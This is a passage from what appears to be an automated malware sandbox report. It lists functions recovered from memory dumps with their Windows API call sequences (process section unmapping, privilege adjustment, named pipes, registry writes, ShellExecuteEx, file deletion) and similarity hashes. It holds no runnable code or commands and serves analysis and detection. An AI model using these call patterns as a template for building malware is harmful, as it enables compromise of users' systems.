    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
